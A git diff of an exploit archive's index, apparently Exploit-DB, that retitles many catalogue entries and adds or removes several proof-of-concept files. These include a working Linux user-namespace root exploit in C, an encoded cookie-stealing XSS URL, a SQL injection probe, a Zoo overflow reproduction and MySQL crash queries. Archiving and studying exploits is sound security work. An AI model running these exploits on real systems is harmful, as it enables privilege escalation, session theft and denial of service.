-15944,platforms/linux/local/15944.c,"Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)",2011-01-08,"Joe Sylve",linux,local,0
+15944,platforms/linux/local/15944.c,"Linux Kernel 2.6.34+ - CAP_SYS_ADMIN x86 & x64 Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
 15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0
 15946,platforms/windows/dos/15946.py,"IrfanView 4.28 Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
 15957,platforms/windows/remote/15957.py,"KingView 6.5.3 SCADA HMI Heap Overflow PoC",2011-01-09,"Dillon Beresford",windows,remote,0
@ -17261,7 +17254,7 @@ id,file,description,date,author,platform,type,port
 19930,platforms/windows/local/19930.rb,"Windows Escalate Task Scheduler XML Privilege Escalation",2012-07-19,metasploit,windows,local,0
 19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow",2012-07-19,metasploit,windows,remote,998
 19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow",2012-07-19,metasploit,windows,remote,998
-19933,platforms/linux/local/19933.rb,"Linux Kernel Sendpage Local Privilege Escalation",2012-07-19,metasploit,linux,local,0
+19933,platforms/linux/local/19933.rb,"Linux Kernel - Sendpage Local Privilege Escalation",2012-07-19,metasploit,linux,local,0
 19937,platforms/windows/remote/19937.pl,"Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit",2012-07-19,mr.pr0n,windows,remote,0
 19938,platforms/beos/dos/19938.txt,"BeOS 5.0 TCP Fragmentation Remote DoS Vulnerability",2000-05-18,visi0n,beos,dos,0
 19939,platforms/windows/remote/19939.html,"Internet Explorer 4.0/5.0/5.5 preview/5.0.1 - DocumentComplete() Cross Frame Access Vulnerability",2000-05-17,"Andrew Nosenko",windows,remote,0
@ -19163,9 +19156,7 @@ id,file,description,date,author,platform,type,port
 21912,platforms/php/webapps/21912.txt,"Killer Protection 1.0 Information Disclosure Vulnerability",2002-10-07,frog,php,webapps,0
 21913,platforms/windows/remote/21913.txt,"Citrix Published Applications Information Disclosure Vulnerability",2002-10-07,wire,windows,remote,0
 21914,platforms/asp/webapps/21914.txt,"SSGBook 1.0 Image Tag HTML Injection Vulnerabilities",2002-10-08,frog,asp,webapps,0
-21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002 Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
+21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/ Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
 21916,platforms/windows/dos/21916.txt,"Kaspersky Labs Anti-Hacker 1.0 Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
 21917,platforms/windows/dos/21917.txt,"BlackIce Server Protection 3.5/BlackICE Defender 2.9 Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
 21918,platforms/php/webapps/21918.html,"VBZoom 1.0 - Remote SQL Injection Vulnerability",2002-10-08,hish,php,webapps,0
 21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 Trojan Horse Vulnerability",2002-10-08,netmask,unix,remote,0
 21920,platforms/asp/webapps/21920.txt,"Microsoft Content Management Server 2001 Cross-Site Scripting Vulnerability",2002-10-09,overclocking_a_la_abuela,asp,webapps,0
@ -21150,22 +21141,19 @@ id,file,description,date,author,platform,type,port
 23963,platforms/php/webapps/23963.txt,"TikiWiki Project 1.8 tiki-usermenu.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
 23964,platforms/php/webapps/23964.txt,"TikiWiki Project 1.8 tiki-list_file_gallery.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
 23965,platforms/php/webapps/23965.txt,"TikiWiki Project 1.8 tiki-directory_ranking.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
-23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 tiki-browse_categories.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
+23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 - tiki-browse_categories.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
 23967,platforms/php/webapps/23967.txt,"E SMS Script Multiple SQL Injection Vulnerabilities",2013-01-08,"cr4wl3r ",php,webapps,0
 23968,platforms/asp/webapps/23968.txt,"Advantech WebAccess HMI/SCADA Software Persistence XSS Vulnerability",2013-01-08,"SecPod Research",asp,webapps,0
 23969,platforms/windows/remote/23969.rb,"IBM Cognos tm1admsd.exe Overflow Vulnerability",2013-01-08,metasploit,windows,remote,0
 23970,platforms/php/webapps/23970.rb,"WordPress Plugin Google Document Embedder Arbitrary File Disclosure",2013-01-08,metasploit,php,webapps,0
-23971,platforms/php/webapps/23971.txt,"TikiWiki Project 1.8 tiki-index.php comments_offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
+23971,platforms/php/webapps/23971.txt,"TikiWiki Project 1.8 - tiki-index.php comments_offset & offset Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0
-23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 tiki-user_tasks.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
+23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 - tiki-user_tasks.php offset & sort_mode Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0
 23973,platforms/php/webapps/23973.txt,"TikiWiki Project 1.8 tiki-directory_search.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
 23974,platforms/php/webapps/23974.txt,"TikiWiki Project 1.8 tiki-file_galleries.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
 23975,platforms/php/webapps/23975.txt,"TikiWiki Project 1.8 tiki-list_faqs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
 23976,platforms/php/webapps/23976.txt,"TikiWiki Project 1.8 tiki-list_trackers.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
 23977,platforms/php/webapps/23977.txt,"TikiWiki Project 1.8 tiki-list_blogs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
 23978,platforms/php/webapps/23978.txt,"TikiWiki Project 1.8 tiki-usermenu.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
 23979,platforms/php/webapps/23979.txt,"TikiWiki Project 1.8 tiki-browse_categories.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
 23980,platforms/php/webapps/23980.txt,"TikiWiki Project 1.8 tiki-index.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
 23981,platforms/php/webapps/23981.txt,"TikiWiki Project 1.8 tiki-user_tasks.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
 23982,platforms/php/webapps/23982.txt,"TikiWiki Project 1.8 tiki-list_faqs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
 23983,platforms/php/webapps/23983.txt,"TikiWiki Project 1.8 tiki-list_trackers.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
 23984,platforms/php/webapps/23984.txt,"TikiWiki Project 1.8 tiki-list_blogs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
@ -22423,7 +22411,6 @@ id,file,description,date,author,platform,type,port
 25303,platforms/linux/dos/25303.txt,"Multiple Vendor Telnet Client Env_opt_add Heap-Based Buffer Overflow Vulnerability",2005-03-28,"Gael Delalleau",linux,dos,0
 25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0
 25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure Exploit",2013-05-08,HTP,multiple,webapps,0
 25307,platforms/linux/local/25307.c,"Linux Kernel open-time Capability file_ns_capable() - Privilege Escalation Vulnerability",2013-05-08,"Andrew Lutomirski",linux,local,0
 25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 showgallery.php Multiple Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0
 25309,platforms/php/webapps/25309.txt,"PhotoPost Pro 5.1 showmembers.php Multiple Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0
 25310,platforms/php/webapps/25310.txt,"PhotoPost Pro 5.1 slideshow.php photo Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0
@ -22565,7 +22552,7 @@ id,file,description,date,author,platform,type,port
 25447,platforms/php/webapps/25447.txt,"AlienVault OSSIM 4.1.2 - Multiple SQL Injection Vulnerabilities",2013-05-14,RunRunLevel,php,webapps,0
 25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 ERS File Handling Buffer Overflow",2013-05-14,metasploit,windows,local,0
 25449,platforms/php/webapps/25449.txt,"UMI.CMS 2.9 - CSRF Vulnerability",2013-05-14,"High-Tech Bridge SA",php,webapps,0
-25450,platforms/linux/local/25450.c,"Linux Kernel open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0
+25450,platforms/linux/local/25450.c,"Linux Kernel 3.8.x - open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0
 25451,platforms/php/webapps/25451.txt,"PHPBB 1.x/2.0.x Knowledge Base Module KB.PHP SQL Injection Vulnerability",2005-04-13,deluxe@security-project.org,php,webapps,0
 25452,platforms/multiple/remote/25452.pl,"Oracle 10g Database SUBSCRIPTION_NAME Remote SQL Injection Vulnerability (1)",2007-02-23,bunker,multiple,remote,0
 25453,platforms/multiple/remote/25453.pl,"Oracle 10g Database SUBSCRIPTION_NAME Remote SQL Injection Vulnerability (2)",2007-02-26,bunker,multiple,remote,0
@ -23231,7 +23218,7 @@ id,file,description,date,author,platform,type,port
 26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service Vulnerability",2005-08-09,"Patrick Webster",osx,dos,0
 26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - CSRF Vulnerability",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0
 26130,platforms/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos,0
-26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 perf_swevent_init - Local root Exploit",2013-06-11,"Andrea Bittau",linux,local,0
+26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local root Exploit",2013-06-11,"Andrea Bittau",linux,local,0
 26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection Vulnerability",2013-06-11,"CWH Underground",php,webapps,0
 26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21
 26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,metasploit,windows,remote,0
@ -24494,7 +24481,6 @@ id,file,description,date,author,platform,type,port
 27423,platforms/php/webapps/27423.txt,"DSCounter 1.2 Index.PHP SQL Injection Vulnerability",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0
 27424,platforms/php/webapps/27424.txt,"DSDownload 1.0 - Multiple SQL-Injection Vulnerabilities",2006-03-15,"Aliaksandr Hartsuyeu",php,webapps,0
 27425,platforms/linux/dos/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow Vulnerability",2006-03-16,"Josh Bressers",linux,dos,0
 27426,platforms/linux/local/27426.txt,"Zoo 2.10 Parse.c Local Buffer Overflow Vulnerability",2006-03-16,"Josh Bressers",linux,local,0
 27427,platforms/php/webapps/27427.txt,"Contrexx CMS 1.0.x Index.PHP Cross-Site Scripting Vulnerability",2006-03-16,Soot,php,webapps,0
 27428,platforms/hardware/remote/27428.rb,"D-Link Devices Unauthenticated Remote Command Execution",2013-08-08,metasploit,hardware,remote,0
 27429,platforms/windows/remote/27429.rb,"Firefox onreadystatechange Event DocumentViewerImpl Use After Free",2013-08-08,metasploit,windows,remote,0
@ -24774,9 +24760,8 @@ id,file,description,date,author,platform,type,port
 27717,platforms/php/webapps/27717.txt,"phpldapadmin 0.9.8 compare_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0
 27718,platforms/php/webapps/27718.txt,"phpldapadmin 0.9.8 copy_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0
 27719,platforms/php/webapps/27719.txt,"phpldapadmin 0.9.8 rename_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0
 27720,platforms/php/webapps/27720.txt,"phpldapadmin 0.9.8 delete_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0
 27721,platforms/php/webapps/27721.txt,"phpldapadmin 0.9.8 search.php scope Parameter XSS",2006-04-21,r0t,php,webapps,0
-27722,platforms/php/webapps/27722.txt,"phpldapadmin 0.9.8 template_engine.php Multiple Parameter XSS",2006-04-21,r0t,php,webapps,0
+27722,platforms/php/webapps/27722.txt,"phpldapadmin 0.9.8 - template_engine.php Multiple Parameter XSS",2006-04-21,r0t,php,webapps,0
 27723,platforms/linux/dos/27723.txt,"Yukihiro Matsumoto Ruby 1.x XMLRPC Server Denial of Service Vulnerability",2006-04-21,"Tanaka Akira",linux,dos,0
 27724,platforms/php/webapps/27724.txt,"Scry Gallery Directory Traversal Vulnerability",2006-04-21,"Morocco Security Team",php,webapps,0
 27725,platforms/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps,0
@ -24898,8 +24883,7 @@ id,file,description,date,author,platform,type,port
 27843,platforms/php/webapps/27843.txt,"MyBB 1.1.1 Showthread.PHP SQL Injection Vulnerability",2006-05-09,Breeeeh,php,webapps,0
 27844,platforms/asp/webapps/27844.txt,"EPublisherPro 0.9.7 Moreinfo.ASP Cross-Site Scripting Vulnerability",2006-05-09,Dj_Eyes,asp,webapps,0
 27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 Session.INC.PHP Remote File Include Vulnerability",2006-05-09,ReZEN,php,webapps,0
-27846,platforms/asp/webapps/27846.txt,"EImagePro 0 subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
+27846,platforms/asp/webapps/27846.txt,"EImagePro 0 - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
 27847,platforms/asp/webapps/27847.txt,"EImagePro 0 imageList.asp SubjectID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
 27848,platforms/php/webapps/27848.txt,"EImagePro 0 view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0
 27849,platforms/asp/webapps/27849.txt,"EDirectoryPro Search_result.ASP SQL Injection Vulnerability",2006-05-09,Dj_Eyes,asp,webapps,0
 27850,platforms/windows/dos/27850.txt,"Microsoft Infotech Storage Library Heap Corruption Vulnerability",2006-05-09,"Ruben Santamarta ",windows,dos,0
@ -25322,7 +25306,6 @@ id,file,description,date,author,platform,type,port
 28282,platforms/php/webapps/28282.txt,"phpbb-auction 1.x auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0
 28283,platforms/hardware/webapps/28283.txt,"Zyxel Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,hardware,webapps,0
 28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 ActiveX Control (IcoLaunch) File Execution",2013-09-15,blake,windows,remote,0
 28285,platforms/php/webapps/28285.txt,"Zyxel Prestige 660H-61 ADSL Router RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,php,webapps,0
 28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow Vulnerability",2006-07-27,hdm,windows,dos,0
 28287,platforms/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x Insecure Default Permissions on Shared Memory Vulnerability",2006-07-27,anonymous,linux,local,0
 28288,platforms/linux/local/28288.c,"MidiRecord2 MidiRecord.CC Local Buffer Overflow Vulnerability",2006-07-27,"Dedi Dwianto",linux,local,0
@ -26982,8 +26965,7 @@ id,file,description,date,author,platform,type,port
 30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 Email FormMail.PHP Input Validation Vulnerability",2007-05-15,"Jesper Jurcenoks",php,webapps,0
 30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 - view/search/ path Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0
 30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0
-30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Embedded ICC Profile Image Parser Overflow",2007-05-16,"Chris Evans",linux,remote,0
+30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Multiple Vulnerabilities",2007-05-16,"Chris Evans",linux,remote,0
 30044,platforms/linux/dos/30044.txt,"Sun Java JDK 1.x - BMP Parsing Remote Privilege Escalation",2007-05-16,"Chris Evans",linux,dos,0
 30045,platforms/windows/remote/30045.html,"PrecisionID Barcode PrecisionID_Barcode.DLL ActiveX 1.9 Control Arbitrary File Overwrite Vulnerability",2007-05-16,shinnai,windows,remote,0
 30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup <= 11.5 mediasvr caloggerd Denial of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0
 30047,platforms/php/webapps/30047.txt,"VBulletin <= 3.6.6 Calendar.PHP HTML Injection Vulnerability",2007-05-16,"laurent gaffie",php,webapps,0
@ -27181,11 +27163,10 @@ id,file,description,date,author,platform,type,port
 30269,platforms/jsp/webapps/30269.txt,"NetFlow Analyzer 5 /jspui/selectDevice.jsp rtype Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0
 30270,platforms/jsp/webapps/30270.txt,"NetFlow Analyzer 5 /jspui/customReport.jsp rtype Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0
 30271,platforms/java/webapps/30271.txt,"OpManager 6/7 ping.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0
-30272,platforms/java/webapps/30272.txt,"OpManager 6/7 traceRoute.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0
+30272,platforms/java/webapps/30272.txt,"OpManager 6/7 - traceRoute.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0
 30273,platforms/java/webapps/30273.txt,"OpManager 6/7 reports/ReportViewAction.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0
 30274,platforms/java/webapps/30274.txt,"OpManager 6/7 admin/ServiceConfiguration.do operation Parameter XSS",2007-07-04,Lostmon,java,webapps,0
 30275,platforms/java/webapps/30275.txt,"OpManager 6/7 admin/DeviceAssociation.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0
 30276,platforms/java/webapps/30276.txt,"OpManager 6/7 map/traceRoute.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0
 30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 Login.PHP Multiple Local File Include Vulnerabilities",2007-07-05,"Adriel T. Desautels",php,webapps,0
 30278,platforms/windows/remote/30278.c,"SAP DB 7.x Web Server WAHTTP.EXE Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0
 30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server <= 7.0 PARAMS Cross Site Scripting Vulnerability",2007-07-05,"Mark Litchfield",multiple,remote,0
@ -29042,10 +29023,9 @@ id,file,description,date,author,platform,type,port
 32257,platforms/php/webapps/32257.txt,"PromoProducts 'view_product.php' Multiple SQL Injection Vulnerabilities",2008-08-15,baltazar,php,webapps,0
 32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 'awstats.pl' Cross-Site Scripting Vulnerability",2008-08-18,"Morgan Todd",cgi,webapps,0
 32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
 32260,platforms/php/webapps/32260.txt,"Freeway 1.4.1.171 french/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
 32261,platforms/windows/local/32261.rb,"MicroP 0.1.1.1600 - (.mppl) Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",windows,local,0
 32263,platforms/php/webapps/32263.txt,"Trixbox (endpoint_aastra.php, mac param)  - Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80
-32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
+32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
 32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 includes/modules/faqdesk/faqdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
 32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 includes/modules/newsdesk/newsdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
 32267,platforms/php/webapps/32267.txt,"Freeway 1.4.1.171 templates/Freeway/boxes/card1.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
@ -30107,3 +30087,8 @@ id,file,description,date,author,platform,type,port
 33392,platforms/php/webapps/33392.txt,"YOOtheme Warp5 Joomla! Component 'yt_color' Parameter Cross Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0
 33393,platforms/php/webapps/33393.txt,"Joomla! You!Hostit! 1.0.1 Template Cross-Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0
 33394,platforms/php/webapps/33394.txt,"Invision Power Board <= 3.0.3 '.txt' File MIME-Type Cross Site Scripting Vulnerability",2009-12-09,Xacker,php,webapps,0
 33396,platforms/php/webapps/33396.txt,"Zeeways ZeeJobsite 'basic_search_result.php' Cross Site Scripting Vulnerability",2009-12-10,bi0,php,webapps,0
 33397,platforms/linux/dos/33397.txt,"MySQL <= 6.0.9 SELECT Statement WHERE Clause Sub-query DoS",2009-11-23,"Shane Bester",linux,dos,0
 33398,platforms/linux/dos/33398.txt,"MySQL <= 6.0.9 GeomFromWKB() Function First Argument Geometry Value Handling DoS",2009-11-23,"Shane Bester",linux,dos,0
 33399,platforms/multiple/remote/33399.txt,"Oracle E-Business Suite 11i Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,remote,0
 33400,platforms/php/webapps/33400.txt,"Ez Cart 'sid' Parameter Cross Site Scripting Vulnerability",2009-12-14,anti-gov,php,webapps,0
--- a/platforms/asp/webapps/27847.txt
+++ b/platforms/asp/webapps/27847.txt
@ -1,7 +0,0 @@
 source: http://www.securityfocus.com/bid/17911/info
 EImagePro is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. 
 Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
 http://www.example.com/imagegallery/subList.asp?CatID=&#039;
--- a/platforms/java/webapps/30276.txt
+++ b/platforms/java/webapps/30276.txt
@ -1,7 +0,0 @@
 source: http://www.securityfocus.com/bid/24767/info
 OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 http://www.example.com/map/traceRoute.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C% 6F%73%74%6D%6F%6E%2E62% 6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%2 0%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3 E%3C%2F%62%6F%64%79%3E 
--- a/platforms/linux/dos/30044.txt
+++ b/platforms/linux/dos/30044.txt
@ -1,9 +0,0 @@
 source: http://www.securityfocus.com/bid/24004/info
 Sun JDK is prone to a multiple vulnerabilities.
 An attacker can exploit these issues to crash the affected application, effectively denying service. The attacker may also be able to execute arbitrary code, which may facilitate a compromise of the underlying system.
 Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected. 
 http://www.exploit-db.com/sploits/30043.zip
--- a/platforms/linux/dos/33397.txt
+++ b/platforms/linux/dos/33397.txt
@ -0,0 +1,17 @@
 source: http://www.securityfocus.com/bid/37297/info
 MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
 An attacker can exploit these issues to crash the application, denying access to legitimate users.
 Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable. 
 drop table if exists `t1`;
 create table `t1`(`a` float);
 insert into `t1` values (-2),(-1);
 select  1 from `t1`
 where
 `a` <> '1' and not
 row(`a`,`a`) <=>
 row((select 1 from `t1` where 1=2),(select 1 from `t1`)) 
 into @`var0`;
--- a/platforms/linux/dos/33398.txt
+++ b/platforms/linux/dos/33398.txt
@ -0,0 +1,14 @@
 source: http://www.securityfocus.com/bid/37297/info
 MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
 An attacker can exploit these issues to crash the application, denying access to legitimate users.
 Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable. 
 drop table if exists `t1`;
 create table `t1`(`c0` bigint,`c3` multipolygon);
 insert into `t1` values 
 (0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));
 select 1 from `t1` where 
 `c0` <>  (select geometrycollectionfromwkb(`c3`) from `t1`);
--- a/platforms/linux/local/25307.c
+++ b/platforms/linux/local/25307.c
@ -1,94 +0,0 @@
 /* userns_root_sploit.c by */
 /* Copyright (c) 2013 Andrew Lutomirski.  All rights reserved. */
 /* You may use, modify, and redistribute this code under the GPLv2. */
 #define _GNU_SOURCE
 #include <unistd.h>
 #include <sched.h>
 #include <sys/types.h>
 #include <sys/wait.h>
 #include <sys/mman.h>
 #include <fcntl.h>
 #include <stdio.h>
 #include <string.h>
 #include <err.h>
 #include <linux/futex.h>
 #include <errno.h>
 #include <unistd.h>
 #include <sys/syscall.h>
 #ifndef CLONE_NEWUSER
 #define CLONE_NEWUSER 0x10000000
 #endif
 pid_t parent;
 int *ftx;
 int childfn()
 {
  int fd;
  char buf[128];
  if (syscall(SYS_futex, ftx, FUTEX_WAIT, 0, 0, 0, 0) == -1 &&
      errno != EWOULDBLOCK)
    err(1, "futex");
  sprintf(buf, "/proc/%ld/uid_map", (long)parent);
  fd = open(buf, O_RDWR | O_CLOEXEC);
  if (fd == -1)
    err(1, "open %s", buf);
  if (dup2(fd, 1) != 1)
    err(1, "dup2");
  // Write something like "0 0 1" to stdout with elevated capabilities.
  execl("./zerozeroone", "./zerozeroone");
  return 0;
 }
 int main(int argc, char **argv)
 {
  int dummy, status;
  pid_t child;
  if (argc < 2) {
    printf("usage: userns_root_sploit COMMAND ARGS...\n\n"
           "This will run a command as (global) uid 0 but no capabilities.\n");
    return 1;
  }
  ftx = mmap(0, sizeof(int), PROT_READ | PROT_WRITE,
             MAP_SHARED | MAP_ANONYMOUS, -1, 0);
  if (ftx == MAP_FAILED)
    err(1, "mmap");
  parent = getpid();
  if (signal(SIGCHLD, SIG_DFL) != 0)
    err(1, "signal");
  child = fork();
  if (child == -1)
    err(1, "fork");
  if (child == 0)
    return childfn();
  *ftx = 1;
  if (syscall(SYS_futex, ftx, FUTEX_WAKE, 1, 0, 0, 0) != 0)
    err(1, "futex");
  if (unshare(CLONE_NEWUSER) != 0)
    err(1, "unshare(CLONE_NEWUSER)");
  if (wait(&status) != child)
    err(1, "wait");
  if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
    errx(1, "child failed");
  if (setresuid(0, 0, 0) != 0)
    err(1, "setresuid");
  execvp(argv[1], argv+1);
  err(1, argv[1]);
  return 0;
 }
--- a/platforms/linux/local/27426.txt
+++ b/platforms/linux/local/27426.txt
@ -1,13 +0,0 @@
 source: http://www.securityfocus.com/bid/17126/info
 Zoo is prone to a local buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.
 An attacker can exploit this issue to execute arbitrary code in the context of the victim user running the affected application to potentially gain elevated privileges.
 mkdir `perl -e 'print "A"x254'`
 cd `perl -e 'print "A"x254'`
 mkdir `perl -e 'print "A"x254'`
 cd `perl -e 'print "A"x254'`
 touch feh
 cd ../..
 zoo a arch.zoo `perl -e 'print "A"x254 . "/" . "A"x254 . "/feh"'`
--- a/platforms/linux/remote/30043.txt
